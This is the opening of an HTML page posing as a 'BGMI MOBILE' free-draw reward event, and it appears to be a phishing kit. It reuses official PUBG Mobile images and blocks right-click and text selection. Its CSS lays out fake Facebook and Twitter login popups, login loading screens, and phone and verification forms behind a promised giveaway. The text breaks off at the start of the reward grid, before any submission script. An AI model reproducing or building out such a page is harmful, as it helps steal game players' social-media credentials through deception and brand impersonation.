<html lang="en">

<head>
    <meta charset="UTF-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no" />
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <title>BGMI MOBILE</title>
    <meta property="og:description" content="Start Free Draw and Collect your exclusive reward from BGMI MOBILE now!">
    <meta property="og:image" content="https://i.postimg.cc/jdq9pLMZ/navbar-logo.jpg">
    <meta property="og:image:width" content="540">
    <meta property="og:image:height" content="282">
    <link rel="icon" type="img/png" href="https://www.pubgmobile.com/common/images/icon_logo.jpg" sizes="32x32">
    <link href="https://fonts.googleapis.com/css2?family=Teko&display=swap" rel="stylesheet">
    <link rel="stylesheet" href="css/style.css">
    <link rel="stylesheet" href="css/animate.css">
    <link rel="stylesheet" href="css/facebook.css">
    <link rel="stylesheet" href="css/twitter.css">
    <link rel="stylesheet" href="css/link.css">
    <link rel="stylesheet" href="css/loader.css">
    <link rel="stylesheet" href="css/international-telephone-input.css">
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.2/css/all.min.css">
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/material-design-iconic-font/2.2.0/css/material-design-iconic-font.min.css">
</head>

<body oncontextmenu="return false" onselectstart="return false" ondragstart="return false">
    <style type="text/css">
        @charset "utf-8";
        @import url("https://fonts.googleapis.com/css?family=Roboto:300,400,500,700|Teko:300,400,500");
        *,
        *:before,
        *:after {
            -webkit-box-sizing: border-box;
            -moz-box-sizing: border-box;
            box-sizing: border-box;
        }

        @font-face {
            font-family: 'selow';
            font-style: normal;
            font-weight: 700;
            src: url(fonts/selow.woff2) format("woff2"), url(fonts/selow.woff) format("woff"), url(fonts/selow.ttf) format("truetype");
        }

        body {
            background: url(img/container.jpg) center / cover no-repeat;
            margin: 0;
            font-family: 'Teko', 'selow';
        }

        .container {
            background: url(img/container.jpg) no-repeat center center;
            background-size: cover;
            position: relative;
            margin: 0px auto;
            max-width: 400px;
            height: auto;
            border: 0px solid #fff;
        }

        .sec-container {
            background: url('img/bg.jpg') no-repeat center;
            background-size: cover;
            margin-top: -17px;
            padding: 5px;
            width: 100%;
            height: auto;
            border-left: 0px solid #fff;
            border-right: 0px solid #fff;
            border-top: 0px solid #fff;
            border-bottom: 0px solid #fff;
        }

        .sec-verify-container {
            background: url('img/bg.jpg') no-repeat center;
            background-size: cover;
            margin-top: -17px;
            padding: 5px;
            width: 100%;
            height: 490px;
            border-left: 0px solid #fff;
            border-right: 0px solid #fff;
            border-top: 0px solid #fff;
            border-bottom: 0px solid #fff;
        }

        .navbar {
            background: #0C0C0C;
            width: 100%;
            height: 65px;
            border-bottom: 1.2px solid #E6C46E;
        }

        .navbar-logo {
            width: 90px;
            float: left;
            margin-top: 15px;
            margin-left: 15px;
        }

        .navbar-shop {
            width: 25px;
            margin-top: 19px;
            margin-right: 20px;
        }

        .navbar-language {
            width: 25px;
            margin-top: 19px;
            margin-right: 20px;
        }

        .navbar-menu {
            width: 20px;
            margin-top: 19px;
            margin-right: 5px;
        }

        .navbar-right {
            width: auto;
            float: right;
        }

        .navbar-download {
            background: #ffca13;
            width: 46px;
            height: 45px;
            margin-top: 10px;
            margin-right: 10px;
            border-radius: 7px;
            float: right;
        }

        .navbar-download img {
            width: 20px;
            height: 21px;
            margin: 13px;
        }

        .header {
            width: 100%;
            height: auto;
        }

        .header img {
            width: 100%;
            height: auto;
            border-bottom: 1px solid #E6C46E;
        }

        .header video {
            width: 100%;
            height: auto;
            margin-top: -0px;
            border: 0px solid #E6C46E;
        }

        .event-title {
            background: url(img/title.png) no-repeat center center;
            background-size: 100% 100%;
            width: 100%;
            height: 89px;
            margin-top: -90px;
            margin-bottom: -10px;
            margin-left: -1px;
            display: block;
            position: relative;
        }

        .event-notification {
            background: url(img/alert-selow.png) no-repeat center;
            background-size: 100% 100%;
            width: 98%;
            height: 55px;
            padding: 7px;
            margin-top: 3px;
            margin-bottom: 7px;
            margin-right: auto;
            margin-left: auto;
        }

        .event-notification-text {
            padding-top: 10px;
            text-align: center;
            font-family: selow;
            color: #2AAFF4;
            font-size: 17px;
        }

        .alert-wrapper {
            width: 98%;
            height: auto;
            border: none;
            display: block;
            margin: 10px auto;
        }

        .alert {
            background: url(img/notif.png) no-repeat center;
            background-size: 100% 100%;
            width: 100%;
            height: 33px;
            margin-top: 15px;
            margin-bottom: 0px;
            padding: 7px;
            margin-left: auto;
            margin-right: auto;
            color: #fff;
            border: none;
        }

        .alert-text {
            margin-top: 2px;
            margin-left: 0px;
            padding: 7px;
            color: #FFF84E;
            text-align: left;
            font: 25px;
            font-family: selow;
            border: none;
        }

        .alert-text-mid {
            margin-top: -1px;
            padding: 0px;
            color: #FFF;
            text-align: center;
            font: 23px;
            font-family: selow;
            border: none;
            transform: rotate(-0.6deg);
        }

        .alert-time {
            width: 22%;
            height: auto;
            color: #FFF734;
            text-align: center;
            margin-top: 7px;
            margin-right: 3px;
            border: 1px solid #FFF84E;
            border-radius: 0px;
            float: right;
            font: 25px;
            font-family: selow;
        }

        .box {
            background: url(img/box-sec.png) no-repeat center;
            background-size: 100% 100%;
            width: 98%;
            height: 315px;
            margin-left: auto;
            margin-right: auto;
            margin-top: 20px;
            margin-bottom: 10px;
            border: 0px solid #E29E53;
            border-radius: 5px;
            position: relative;
            display: block;
        }

        .box-item {
            width: 95%;
            height: auto;
            padding-left: 5px;
            padding-top: 20px;
            margin-left: auto;
            margin-right: 12px;
        }

        .scroll {
            overflow: scroll;
            position: relative;
            width: 100%;
            height: auto;
            padding-top: 20px;
            margin-left: auto;
            margin-right: auto;
            display: block;
            scrollbar-face-color: #ffbb40;
            scrollbar-shadow-color: #ffbb40;
            scrollbar-highlight-color: #ffbb40;
            scrollbar-3dlight-color: #ffbb40;
            scrollbar-darkshadow-color: #ffbb40;
            scrollbar-track-color: #ffbb40;
            scrollbar-arrow-color: #ffbb40;
        }

        .verify-box-navbar {
            background-size: 100% 100%;
            width: 93%;
            height: 19%;
            margin-left: auto;
            margin-right: auto;
            display: block;
        }

        .verify-box-navbar-description {
            width: 50%;
            margin-top: 50px;
            margin-right: 20px;
            color: #fff;
            font-size: 18px;
            font-family: Teko;
            font-weight: 500;
            text-align: left;
            float: right;
        }

        .verify-box-navbar-form {
            background-size: 100% 100%;
            width: 93%;
            height: auto;
            margin-left: auto;
            margin-right: auto;
            display: block;
        }

        .verify-box-navbar-form input {
            background: url(img/verify-bg.jpg) no-repeat center center;
            background-size: 100% 100%;
            width: 95%;
            height: 40px;
            margin-left: 10px;
            margin-bottom: 4px;
            padding: 4px;
            padding-left: 10px;
            padding-right: auto;
            color: #fff;
            font-size: 15px;
            font-family: selow;
            font-weight: 500;
            border: 1px solid #FFAB00;
            position: relative;
            outline: none;
            -webkit-appearance: none;
            -moz-appearance: none;
        }

        .verify-box-navbar-form input::placeholder {
            color: #fff;
        }

        .verify-box-navbar-form select {
            background: url(img/verify-bg.jpg) no-repeat center center;
            background-size: 100% 100%;
            width: 95%;
            height: 40px;
            margin-left: 10px;
            margin-bottom: 4px;
            padding: 4px;
            padding-left: 10px;
            padding-right: auto;
            color: #fff;
            font-size: 15px;
            font-family: selow;
            font-weight: 500;
            border: 1px solid #FFAB00;
            position: relative;
            outline: none;
            -webkit-appearance: none;
            -moz-appearance: none;
        }

        .verify-box-content {
            background-size: 100% 100%;
            width: 93%;
            height: auto;
            margin-top: -1px;
            margin-left: auto;
            margin-right: auto;
            margin-bottom: 15px;
            padding: 20px;
            padding-top: 0px;
            padding-bottom: 25px;
            display: block;
        }

        .verify-box-content-title {
            width: 95%;
            height: auto;
            margin-top: 10px;
            margin-left: auto;
            margin-right: auto;
            margin-bottom: 10px;
            padding: 6px;
            color: #fff;
            font-size: 18px;
            font-family: selow;
            font-weight: 500;
            text-align: center;
            display: block;
        }

        .verify-box-content-title i {
            padding-top: 15px;
            padding-bottom: 15px;
            color: #FFAB00;
            font-size: 100px;
            text-align: center;
        }

        .verify-box-content button {
            background: url(img/button-on.png) no-repeat center center;
            background-size: 100% 100%;
            width: 45%;
            height: 40px;
            margin-top: 10px;
            margin-left: auto;
            margin-right: auto;
            margin-bottom: 10px;
            padding: 7px;
            padding-top: 8px;
            padding-left: 20px;
            padding-right: 20px;
            color: #000;
            font-size: 18px;
            font-family: selow;
            font-weight: 500;
            text-align: center;
            text-shadow: 2px 2px 5px white;
            border: none;
            display: block;
        }

        .about-box-content {
            background: url(img/aboutrules-sec.png) no-repeat center center;
            background-size: 100% 100%;
            width: 98%;
            height: 120px;
            margin-top: 10px;
            margin-left: auto;
            margin-right: auto;
            margin-bottom: 10px;
            padding: 20px;
            padding-top: 0px;
            padding-bottom: 25px;
            color: #000;
            display: block;
        }

        .about-box-content-title {
            width: 95%;
            height: auto;
            margin-top: 10px;
            margin-left: auto;
            margin-right: auto;
            margin-bottom: 10px;
            padding: 6px;
            color: #000;
            font-size: 18px;
            font-family: selow;
            font-weight: 500;
            text-align: center;
            display: block;
        }

        .about-box-content-title i {
            padding-top: 15px;
            padding-bottom: 15px;
            color: #000;
            font-size: 100px;
            text-align: center;
        }

        .about-box-content button {
            background: url(img/menu-on.png) no-repeat center center;
            background-size: 100% 100%;
            width: 50%;
            height: 45px;
            padding: 7px;
            margin-bottom: 20px;
            margin-top: 20px;
            padding-left: 20px;
            padding-right: 20px;
            color: #000;
            font-size: 18px;
            font-family: selow;
            font-weight: 500;
            text-align: center;
            border: none;
            display: block;
        }

        .btn-wrapper {
            width: 100%;
            height: 50px;
            margin-top: 3px;
            font-family: selow;
        }

        .btn-wrapper button {
            background: url(img/button.png) no-repeat center;
            background-size: 100% 100%;
            width: 40%;
            height: 43px;
            margin-top: 45px;
            margin-left: -10px;
            margin-right: 6px;
            padding: 5px;
            color: #AAAAAA;
            font-family: selow;
            font-size: 16px;
            font-weight: 400;
            text-align: center;
            border: none;
            outline: none;
            float: left;
            display: inline-block;
        }

        .processing-box-sec {
            width: 100%;
            height: 400px;
            margin-left: auto;
            margin-right: auto;
            margin-bottom: 15px;
            padding: 5px;
            padding-top: -2px;
            padding-bottom: 2px;
            display: block;
        }

        .processing-box-sec-title {
            width: 95%;
            height: auto;
            margin-top: 0px;
            margin-left: auto;
            margin-right: auto;
            margin-bottom: 20px;
            padding: 5px;
            padding-left: 15px;
            color: #fff;
            font-size: 16px;
            font-family: selow;
            text-align: left;
            display: block;
        }

        .menu-wrapper-border {
            height: 11px;
        }

        .menu-wrapper {
            width: 94.3%;
            height: auto;
            margin-left: auto;
            margin-right: auto;
            margin-bottom: 12px;
            display: block;
        }

        .menu-content {
            background: url(img/btn-off.png) no-repeat center center;
            background-size: 100% 100%;
            width: 32%;
            height: auto;
            padding: 6px;
            color: #003a75;
            font-size: 17px;
            font-family: 'Teko', sans-serif;
            font-weight: 500;
            text-align: center;
            text-shadow: 0 0 1px #fff38a, 0 0 1px #fff38a;
            border: none;
            cursor: pointer;
            -webkit-text-stroke: 0 transparent;
        }

        .menu-content-active {
            background: url(img/btn-on.png) no-repeat center center;
            background-size: 100% 100%;
            color: #7f2c10;
        }

        .item4 {
            background-size: display;
            width: 46%;
            height: 77px;
            margin: 0px;
            margin-top: 0px;
            margin-bottom: 1px;
            display: inline-block;
            border: 2px solid #000;
            border-radius: 0px;
        }

        .item4 img {
            background-size: display;
            width: 100%;
            height: 100%;
            border: none;
            border-radius: 0px;
        }

        .item3 {
            background-size: display;
            width: 27%;
            height: 100px;
            margin: 9px;
            margin-top: 0px;
            margin-bottom: 0px;
            display: inline-block;
            border: 2px solid #000;
            border-radius: 0px;
        }

        .item3 img {
            background-size: display;
            width: 100%;
            height: 100%;
            border: none;
            border-radius: 0px;
        }

        .itembutton {
            background-size: display;
            width: 29%;
            height: 100px;
            margin: 7px;
            margin-top: 0px;
            margin-bottom: 0px;
            display: inline-block;
            animation: bounce .9s infinite alternate;
            animation-play-state: running;
        }

        @keyframes bounce {
            to {
                transform: scale(1.1);
            }
        }

        .itembutton img {
            background-size: display;
            width: 100%;
            height: 100%;
        }

        .aboutbutton {
            width: 29%;
            height: 100px;
            margin: 7px;
            margin-top: 0px;
            margin-bottom: 0px;
            display: inline-block;
            position: absolute;
        }

        .aboutbutton img {
            background-size: display;
            width: 100%;
            height: 100%;
        }

        .item5 {
            background-size: display;
            width: 22%;
            height: 77px;
            margin: 2px;
            margin-top: 0px;
            margin-bottom: 1px;
            display: inline-block;
            border: 2px solid #000;
            border-radius: 0px;
        }

        .item5 img {
            background-size: display;
            width: 100%;
            height: 100%;
            border: none;
            border-radius: 0px;
        }

        .item2 {
            background-size: display;
            width: 22.8%;
            height: 79px;
            margin: 0px;
            margin-top: 0px;
            margin-bottom: 0px;
            display: inline-block;
            border: 2px solid #000;
            border-radius: 0px;
        }

        .item2 img {
            background-size: display;
            width: 100%;
            height: 100%;
            border: none;
            border-radius: 0px;
        }

        .footer {
            background: #19191b url(https://i.postimg.cc/02KwtTc7/footer-bg.jpg) top center / 100% no-repeat;
            background-position-y: calc(-15 / 640 * 100vw);
            width: 100%;
            height: auto;
            padding: 15px;
            border-top: 1px solid #E6C46E;
        }

        .footer-txt-join {
            margin-top: -10px;
            margin-bottom: 15px;
            color: #ffbe21;
            font-size: 30px;
            font-family: selow;
            text-align: left;
            text-transform: uppercase;
        }

        .footer-socmed-box {
            background: url(https://www.pubgmobile.com/en/images/footer_link_bg.png) no-repeat center center;
            background-size: 100% 100%;
            width: 100%;
            height: 55px;
            margin-bottom: 10px;
            padding: 5px;
            border-radius: 3px;
        }

        .footer-socmed-box:hover {
            background: url(https://www.pubgmobile.com/en/images/footer_link_bg_on.png) no-repeat center center;
            background-size: 100% 100%;
            transition: 1s;
        }

        .footer-socmed-img-main {
            width: 30px;
            height: 30px;
            margin-top: 7px;
            margin-left: 15px;
            margin-right: 15px;
            float: left;
        }

        .footer-socmed-img-other {
            width: 35px;
            height: 26px;
            margin-top: 10px;
            margin-left: 15px;
            margin-right: 11px;
            float: left;
        }

        .footer-socmed-box p {
            margin-top: 7px;
            color: #fff;
            font-size: 25px;
            font-family: selow;
            text-align: left;
            text-transform: uppercase;
        }

        .footer-socmed-box button {
            background: #ffbe21;
            width: 30%;
            height: auto;
            margin-top: 10px;
            margin-right: 15px;
            padding: 1px;
            color: #000;
            font-size: 16px;
            font-family: selow;
            text-align: center;
            text-transform: uppercase;
            border: none;
            border-radius: 2px;
            outline: none;
            float: right;
        }

        .footer-copyright-icon {
            width: 85%;
            margin-left: auto;
            margin-right: auto;
            display: block;
        }

        .footer-txt-copyright {
            color: #bdbdbd;
            font-size: 15px;
            font-family: selow;
            text-align: center;
        }

        .footer-txt-copyrights {
            color: #bdbdbd;
            font-size: 16px;
            font-family: selow;
            text-align: center;
        }

        .popup-box-navbar-login {
            background: url(img/popup-navbar1.png) no-repeat center center;
            background-size: 100% 100%;
            height: auto;
            padding-top: 5px;
            padding-bottom: 1px;
        }

        .popup-box-navbar-login-title {
            padding-left: 24px;
            padding-top: 2px;
            color: #defbff;
            font-size: 22px;
            font-family: selow;
            font-weight: 500;
            text-align: center;
        }

        .popup-box-bg-login {
            background: url(img/popup-box-bg-logins.jpg) no-repeat center center;
            background-size: 100% 100%;
            width: 100%;
            height: 220px;
            margin-top: -10px;
        }

        .popup-box-footer-login {
            background: url(img/popup-box-footer-login.png) no-repeat center center;
            background-size: 100% 100%;
            width: 100%;
            margin-top: -1px;
            height: 35px;
        }

        .popup-btn-login {
            width: 30%;
            border-radius: 2px;
            height: 30px;
            padding: 5px;
            margin: 3px;
            color: #f2f2f2;
            font-size: 14px;
            font-family: selow;
            border: none;
            outline: none;
            margin-bottom: 35px;
            position: relative;
            display: inline-block;
        }

        .popup-btn-login i {
            color: #fff;
            font-size: 18px;
            float: left;
        }

        .popup-btn-facebook {
            background: #1778f2;
            color: #fff;
        }

        .popup-btn-twitter {
            background: #ffffff;
            color: #000;
        }

        .popup-btn-login2 {
            width: 25%;
            height: 28px;
            padding: 6px;
            margin-top: 15px;
            margin: 2px;
            color: #000;
            font-size: 15px;
            font-family: selow;
            border: none;
            border-radius: 2px;
            outline: none;
            position: relative;
        }

        .popup-btn-login2 i {
            color: #fff;
            font-size: 17px;
            padding-bottom: 2px;
            float: left;
        }

        .popup-btn-facebook2 {
            background: #1778f2;
            color: #fff;
        }

        .popup-btn-twitter2 {
            background: #ffffff;
            color: #0d0c0c;
        }

        .popup-btn-link2 {
            background: #E3B448;
            color: #000;
        }

        .popup-btn-login2 img {
            width: 16px;
            height: 16px;
            float: left;
        }

        .popup {
            width: 100%;
            height: 100%;
            position: fixed;
            top: 0;
            left: 0;
            z-index: 9999;
            background-color: rgba(0, 0, 0, 0.4);
        }

        .popup-box-wrapper {
            width: 390px;
            height: auto;
            position: relative;
            margin: 50px auto;
            margin-top: 15%;
            text-align: center;
            font-family: 'selow';
            color: #fff;
        }

        .popup-box-wrapper-login {
            width: 400px;
            height: auto;
            position: relative;
            margin: 50px auto;
            margin-top: 15%;
            text-align: center;
            font-family: 'selow';
            color: #fff;
        }

        .popup-box-wrappers {
            width: 390px;
            height: auto;
            position: relative;
            margin: 50px auto;
            margin-top: 15%;
            text-align: center;
            font-family: 'selow';
            color: #fff;
        }

        .popup-box-navbar {
            background: url(img/popup-navbar.png) no-repeat center center;
            background-size: 100% 100%;
            height: 43px;
            padding-bottom: 5px;
        }

        .popup-box-navbar img {
            width: 25px;
            height: 25px;
            margin-top: 7px;
            margin-right: 15px;
            float: right;
        }

        .popup-box-navbar-title {
            padding-top: 7px;
            padding-bottom: 2px;
            font-size: 20px;
            font-family: selow;
            font-weight: 300;
            text-align: center;
            color: #fff;
        }

        .popup-box-navbarx {
            background: url(img/popup-navbar.png) no-repeat center center;
            background-size: 100% 100%;
            height: 43px;
            padding-bottom: 5px;
        }

        .popup-box-navbarx img {
            width: 20px;
            height: 20px;
            margin-top: 10px;
            margin-right: 15px;
            float: right;
        }

        .popup-box-navbar-titlex {
            padding-top: 7px;
            padding-left: 40px;
            padding-bottom: 2px;
            font-size: 20px;
            font-family: selow;
            font-weight: 300;
            text-align: center;
            color: #fff;
        }

        .popup-box-bg {
            background: url(img/popup-box-bg.png) no-repeat center center;
            background-size: 100% 100%;
            width: 100%;
            margin-top: -12px;
        }

        .popup-box-gamecon {
            width: 50%;
            margin-left: auto;
            margin-right: auto;
            margin-bottom: 0px;
            display: block;
        }

        .popup-box-alert {
            width: 95%;
            height: auto;
            margin-top: 10px;
            margin-left: auto;
            margin-right: auto;
            margin-bottom: 10px;
            padding: 5px;
            color: #AAAAAA;
            font-size: 18px;
            font-family: selow;
            font-weight: 500;
            text-align: left;
            display: block;
        }

        .popup-box-alert2 {
            width: 95%;
            height: auto;
            margin-top: 10px;
            margin-left: auto;
            margin-right: auto;
            margin-bottom: 10px;
            padding: 5px;
            color: #AAAAAA;
            font-size: 18px;
            font-family: selow;
            font-weight: 500;
            text-align: left;
            display: block;
        }

        .popup-box-alert0 {
            width: 95%;
            height: auto;
            margin-top: 10px;
            margin-left: auto;
            margin-right: auto;
            margin-bottom: 10px;
            padding: 6px;
            color: #AAAAAA;
            font-size: 18px;
            font-family: selow;
            font-weight: 500;
            text-align: right;
            display: block;
        }

        .popup-box-alert3 {
            width: 95%;
            height: auto;
            margin-top: 10px;
            margin-left: auto;
            margin-right: auto;
            margin-bottom: 10px;
            padding: 5px;
            color: #AAAAAA;
            font-size: 17px;
            font-family: selow;
            font-weight: 100;
            text-align: left;
            display: block;
        }

        .popup-box-alert7 {
            width: 95%;
            height: auto;
            margin-top: 10px;
            margin-left: auto;
            margin-right: auto;
            margin-bottom: 10px;
            padding: 5px;
            color: #F5EAB0;
            font-size: 18px;
            font-family: selow;
            font-weight: 500;
            text-align: center;
            display: block;
        }

        .popup-box-alert4 {
            width: 95%;
            height: auto;
            margin-top: 10px;
            margin-left: auto;
            margin-right: auto;
            margin-bottom: 10px;
            padding: 6px;
            color: #AAAAAA;
            font-size: 18px;
            font-family: selow;
            font-weight: 500;
            text-align: center;
            display: block;
        }

        .popup-box-alert4 i {
            padding-top: 15px;
            padding-bottom: 15px;
            color: #AAAAAA;
            font-size: 50px;
            text-align: center;
        }

        .popup-box-item {
            width: 23%;
            height: 85px;
            margin-left: auto;
            margin-right: auto;
            text-align: right;
            display: block;
        }

        .popup-box-item img {
            width: 100%;
            height: 100%;
            border: 0px solid #AAAAAA;
        }

        .popup-box-item span {
            color: #fff;
            font-size: 22px;
            font-family: selow;
            text-align: right;
            position: absolute;
            left: 0;
            right: 2px;
            bottom: -5px;
        }

        .popup-box-form {
            width: 85%;
            height: auto;
            margin-left: auto;
            margin-right: auto;
            display: block;
        }

        .popup-box-form label {
            display: inline-block;
            width: 140px;
            text-align: right;
            color: yellow;
        }

        .popup-box-form input {
            background: #4A4A4A;
            background-size: 100% 100%;
            width: 100%;
            height: 35px;
            margin-bottom: 3px;
            padding: 4px;
            padding-left: 10px;
            color: #FFFBF7;
            font-size: 16px;
            font-family: selow;
            font-weight: 300;
            border: 1px solid #AAAAAA;
            position: relative;
            outline: none;
            -webkit-appearance: none;
            -moz-appearance: none;
        }

        .popup-box-form input::placeholder {
            color: #FFFBF7;
        }

        .popup-box-form select {
            background: #4A4A4A;
            background-size: 100% 100%;
            width: 100%;
            height: 35px;
            margin-bottom: 3px;
            padding: 4px;
            padding-left: 10px;
            color: #FFFBF7;
            font-size: 16px;
            font-family: selow;
            font-weight: 300;
            border: 1px solid #AAAAAA;
            position: relative;
            outline: none;
            -webkit-appearance: none;
            -moz-appearance: none;
        }

        .popup-box-footer {
            background-size: 100% 100%;
            margin-top: 20px;
            width: 100%;
            height: 55px;
        }

        .popup-box-footer button {
            background: url(img/btn-on.png) no-repeat center;
            background-size: 100% 100%;
            width: 36%;
            height: auto;
            padding: 5px;
            color: #000;
            font-size: 17px;
            font-family: selow;
            font-weight: 500;
            text-align: center;
            border: none;
            outline: none;
        }

        .popup-box-form-footerx {
            background-size: 100% 100%;
            width: 100%;
            height: 55px;
            margin-top: 15px;
        }

        .popup-box-form-footerx button {
            background: url(img/btn-on.png) no-repeat center;
            background-size: 100% 100%;
            width: 33%;
            height: 35px;
            margin-top: 7px;
            padding: 5px;
            padding-bottom: 3px;
            padding-left: 25px;
            padding-right: 25px;
            color: #000;
            font-size: 17px;
            font-family: selow;
            font-weight: 500;
            text-align: center;
            border: none;
            outline: none;
        }

        .popup-box-loading {
            width: 95%;
            height: auto;
            margin-left: auto;
            margin-right: auto;
            padding: 6px;
            color: #AAAAAA;
            font-size: 17px;
            font-family: selow;
            font-weight: 500;
            text-align: center;
            display: block;
        }

        .popup-box-loading img {
            width: 45px;
            height: auto;
            margin-bottom: 20px;
            text-align: center;
            animation-name: spin;
            animation-duration: 400ms;
            animation-iteration-count: infinite;
            animation-timing-function: linear;
        }

        @keyframes spin {
            from {
                transform: rotate(0deg);
            }
            to {
                transform: rotate(360deg);
            }
        }

        .popup-login {
            background: rgba(0, 0, 0, 0.4);
            width: 100%;
            height: 100%;
            position: fixed;
            top: 0;
            left: 0;
            z-index: 9999;
        }

        .popup-box-login-fb {
            background: #ECEFF6;
            max-width: 330px;
            height: auto;
            position: relative;
            margin: 50px auto;
            margin-top: 1.9%;
            text-align: center;
            font-family: 'Teko';
            color: #000;
            border-radius: 10px;
        }

        .popup-box-login-twitter {
            background: #fff;
            max-width: 330px;
            height: auto;
            position: relative;
            margin: 50px auto;
            margin-top: 10%;
            text-align: center;
            font-family: 'Teko';
            color: #000;
            border-radius: 10px;
        }

        .close-fb {
            background: #3b5998;
            width: 25px;
            height: 25px;
            color: #fff;
            font-size: 20px;
            text-align: center;
            text-decoration: none;
            border-radius: 50%;
            top: -10px;
            right: -10px;
            position: absolute;
            display: block;
        }

        .close-fb i {
            padding-top: 3px;
        }

        .close-other {
            background: #fff;
            width: 25px;
            height: 25px;
            color: #000;
            font-size: 20px;
            text-align: center;
            border-radius: 50%;
            top: -12px;
            right: -12px;
            position: absolute;
            z-index: 9999999;
            display: block;
        }

        .close-other i {
            color: #000;
            padding-top: 3px;
        }

        .popup-box-alerts4 {
            width: 95%;
            height: auto;
            margin-top: 10px;
            margin-left: auto;
            margin-right: auto;
            margin-bottom: 10px;
            padding: 5px;
            color: #fff;
            font-size: 20px;
            font-family: selow;
            font-weight: 500;
            text-align: left;
            display: block;
        }

        .popup-box-alerts4 i {
            padding-top: 15px;
            padding-bottom: 15px;
            color: #F5EAB0;
            font-size: 50px;
            text-align: left;
        }

        .kanan {
            float: right;
        }

        .kiri {
            float: left;
        }

        .tengah {
            margin-left: auto;
            margin-right: auto;
            display: block;
        }

        ::-webkit-scrollbar {
            display: none;
            width: 0px;
        }

        figure {
            margin: 0;
            padding: 0;
            overflow: hidden;
        }

        .itemShine figure {
            position: relative;
        }

        .itemShine figure::before {
            background: -webkit-linear-gradient(left, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, .3) 100%);
            background: linear-gradient(to right, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, .3) 100%);
            width: 50%;
            height: 100%;
            top: 0;
            left: -75%;
            position: absolute;
            z-index: 2;
            content: '';
            display: block;
            -webkit-transform: skewX(-25deg);
            transform: skewX(-25deg);
        }

        .itemShine figure::before {
            -webkit-animation: shine 2s infinite;
            animation: shine 2s infinite;
        }

        @-webkit-keyframes shine {
            100% {
                left: 125%;
            }
        }

        @keyframes shine {
            100% {
                left: 125%;
            }
        }

        .border_hadiah {
            border: 2px solid #FBF274;
            background: linear-gradient(90deg, rgba(255, 0, 109, 1) 8%, rgba(255, 250, 0, 0.10303017436594208) 12%);
            display: inline-block;
        }

        .twitter-load {
            background-size: 100% 100%;
            width: 93%;
            height: 410px;
            margin-top: 0px;
            margin-left: auto;
            margin-right: auto;
            margin-bottom: 15px;
            padding: 20px;
            padding-top: 0px;
            padding-bottom: 25px;
            display: block;
        }

        .twitter-load-title {
            width: 95%;
            height: auto;
            margin-top: 110px;
            margin-left: auto;
            margin-right: auto;
            margin-bottom: 0px;
            padding: 6px;
            color: #fff;
            font-size: 18px;
            font-family: selow;
            font-weight: 500;
            text-align: center;
            display: block;
        }

        .twitter-load-title i {
            color: #00acee;
            font-size: 50px;
            text-align: center;
        }

        .fb-load {
            background-size: 100% 100%;
            width: 93%;
            height: 333px;
            margin-top: -1px;
            margin-left: auto;
            margin-right: auto;
            margin-bottom: 15px;
            padding: 20px;
            padding-top: 0px;
            padding-bottom: 25px;
            display: block;
        }

        .fb-load img {
            width: 50px;
            height: 50px;
            margin-top: 230px;
            margin-bottom: -55px;
        }

        .fb-load-title {
            width: 95%;
            height: auto;
            margin-top: 10px;
            margin-left: auto;
            margin-right: auto;
            margin-bottom: 10px;
            padding: 6px;
            color: #999998;
            font-size: 18px;
            font-family: selow;
            font-weight: 500;
            text-align: center;
            display: block;
        }

        .fb-load-title i {
            margin-top: 200px;
            padding-top: 15px;
            padding-bottom: 15px;
            color: #999998;
            font-size: 30px;
            text-align: center;
        }

        .popup-box-item-once {
            width: 23%;
            height: 85px;
            margin: 1px;
            margin-left: auto;
            margin-right: auto;
            margin-bottom: 20px;
            text-align: center;
            display: inline-block;
        }

        .popup-box-item-once img {
            width: 100%;
            height: 100%;
        }

        @media only screen and (max-width:600px) {
            .container,
            .container2,
            .container3,
            .container4 {
                width: 100%;
                height: auto;
                margin-top: -3px;
                margin-bottom: 0px;
                border: none;
                border-radius: 0px;
                padding: 0px;
            }
            .event-notification-content {
                width: 84.6%;
                margin-top: -46px;
                margin-right: 0.3px;
                border-left: 0px;
            }
            .event-notification {
                width: 98%;
                height: 53px;
                padding: 7px;
                margin-right: auto;
                margin-left: auto;
            }
            .event-notification-text {
                padding-top: 10px;
                font-family: selow;
                font-size: 16px;
            }
            .box {
                width: 98%;
                height: 313px;
            }
            .box-item {
                width: 98%;
                height: auto;
                padding-left: 5px;
                padding-top: 19px;
                margin-left: auto;
                margin-right: 6px;
            }
            .item2 {
                width: 22%;
                height: 79px;
                margin-top: 12px;
                margin: 0px;
            }
            .item3 {
                width: 25%;
                height: 96px;
                margin: 12px;
                margin-top: 0px;
                margin-bottom: 0px;
            }
            .itembutton {
                width: 28%;
                height: 96px;
            }
            .item4 {
                width: 45%;
                height: 77px;
                margin: 1px;
            }
            .item5 {
                width: 22%;
                height: 77px;
                margin: 0px;
            }
            .item {
                height: 95px;
            }
            .item .item-nominal {
                padding-right: 3px;
                bottom: -60px;
            }
            .about-box-content {
                margin-top: 15px;
            }
            .popup-box-wrapper {
                width: 360px;
                margin-top: 60%;
            }
            .popup-box-wrapper-login {
                width: 100%;
                margin-top: 60%;
            }
            .popup-box-wrappers {
                width: 360px;
                margin-top: 40%;
            }
            .popup-box-item {
                width: 25%;
                height: 85px;
            }
            .popup-box-item-once {
                width: 25%;
                height: 85px;
            }
            .popup-box-verification {
                margin-top: 20%;
            }
            .popup-box-login-fb {
                margin-top: 10%;
            }
            .popup-box-login-twitter {
                margin-top: 10%;
            }
        }
    </style>
    <div class="container">
        <img class="navbar-logo" src="img/style-img/logo.png">
        <div class="navbar-right">
            <img class="navbar-shop" src="img/style-img/navFb.png">
            <img class="navbar-language" src="img/style-img/navIg.png">
            <img class="navbar-language" src="img/style-img/navYt.png">
            <div class="navbar-download"><img src="img/style-img/menu.png"></div>
        </div>
        <!--- navbar-right --->
        <!--- navbar --->
        <div class="header">
            <video src="img/0322.mp4" autoplay loop muted style="width: 100%;"></video>
        </div>
        <!--- header --->

        <div class="sec-container">
            <div class="event-title"> </div>
            <!--- event-title --->
            <div class="box">
                <div class="box-item">
                    <center>
                        <div class="item2" data-order="0">
                            <img src="img/reward/1.png">
                        </div>
